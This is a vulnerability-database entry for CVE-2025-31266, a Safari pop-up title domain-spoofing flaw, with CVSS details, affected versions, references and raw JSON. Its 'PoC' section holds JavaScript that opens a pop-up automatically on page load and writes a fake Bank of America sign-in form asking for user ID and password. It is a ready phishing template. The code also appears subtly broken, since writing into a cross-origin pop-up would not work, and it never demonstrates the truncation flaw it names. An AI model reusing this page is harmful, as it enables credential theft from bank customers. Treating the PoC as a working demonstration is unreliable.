Security Vulnerability Report
CVE-2025-31266 CVSS 4.3 MEDIUM

Published: 2025-11-21 22:16:20
Last Modified: 2026-04-02 19:19:58

Description

A spoofing issue was addressed with improved truncation when displaying the fully qualified domain name. This issue is fixed in Safari 18.5, macOS Sequoia 15.5. A website may be able to spoof the domain name in the title of a pop-up window.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 18.5
macOS Sequoia < 15.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-31266 PoC - Domain Name Spoofing via Popup Window
// This PoC demonstrates how an attacker can spoof domain names in popup window titles

// Attacker's controlled domain that will appear legitimate after truncation
const ATTACKER_DOMAIN = 'legitimate-bank.' + 'a'.repeat(100) + '.malicious.com';

// Create a malicious page that displays a spoofed popup
const maliciousPage = `
<!DOCTYPE html>
<html>
<head>
  <title>Secure Banking Portal</title>
  <style>
    body { font-family: Arial, sans-serif; padding: 20px; }
    .spoofed-popup {
      border: 2px solid #0066cc;
      padding: 20px;
      background: #f0f8ff;
      max-width: 400px;
    }
  </style>
</head>
<body>
  <h2>Security Alert</h2>
  <div class="spoofed-popup">
    <p>Your session has expired. Please re-authenticate.</p>
    <button onclick="openSpoofedWindow()">Continue to Login</button>
  </div>
  <script>
    function openSpoofedWindow() {
      // Open window with attacker-controlled domain
      // The truncation in Safari may show only the legitimate-looking part
      const fakeWindow = window.open(
        'https://' + '${ATTACKER_DOMAIN}',
        'Login Window',
        'width=500,height=400,menubar=no,toolbar=no'
      );

      // Inject content into the popup to appear as legitimate bank
      if (fakeWindow) {
        fakeWindow.document.write(
          '<html>' +
          '<head><title>Secure Login - Bank of America</title></head>' +
          '<body style="font-family:Arial;text-align:center;padding:50px;">' +
          '<h2>Bank of America - Sign In</h2>' +
          '<form>' +
          '<input type="text" placeholder="User ID" style="padding:10px;margin:10px;"><br>' +
          '<input type="password" placeholder="Password" style="padding:10px;margin:10px;"><br>' +
          '<button type="submit" style="padding:10px 20px;">Sign In</button>' +
          '</form>' +
          '</body>' +
          '</html>'
        );
      }
    }

    // Auto-trigger on page load for demonstration
    // In real attack, this would be triggered via social engineering
    window.onload = function() {
      setTimeout(openSpoofedWindow, 1000);
    };
  </script>
</body>
</html>
`;

console.log('CVE-2025-31266 Domain Spoofing PoC');
console.log('Target: Safari < 18.5, macOS Sequoia < 15.5');
console.log('Attack Vector: Manipulate FQDN truncation for visual spoofing');
console.log('\nTo test this vulnerability:');
console.log('1. Host this page on a web server');
console.log('2. Access it via vulnerable Safari version');
console.log('3. Observe the spoofed domain in popup title');

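References

https://support.apple.com/en-us/122716 (Release Notes, Vendor Advisory)
https://support.apple.com/en-us/122719 (Release Notes, Vendor Advisory)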

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31266", "sourceIdentifier": "[email protected]", "published": "2025-11-21T22:16:19.743", "lastModified": "2026-04-02T19:19:58.183", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A spoofing issue was addressed with improved truncation when displaying the fully qualified domain name. This issue is fixed in Safari 18.5, macOS Sequoia 15.5. A website may be able to spoof the domain name in the title of a pop-up window."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.5", "matchCriteriaId": "2911F28D-586D-4C43-BCE7-A8A77568E183"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.5", "matchCriteriaId": "EF1B4AB8-2B51-4EED-BD29-C500C83FAB10"}]}]}], "references": [{"url": "https://support.apple.com/en-us/122716", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/122719", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}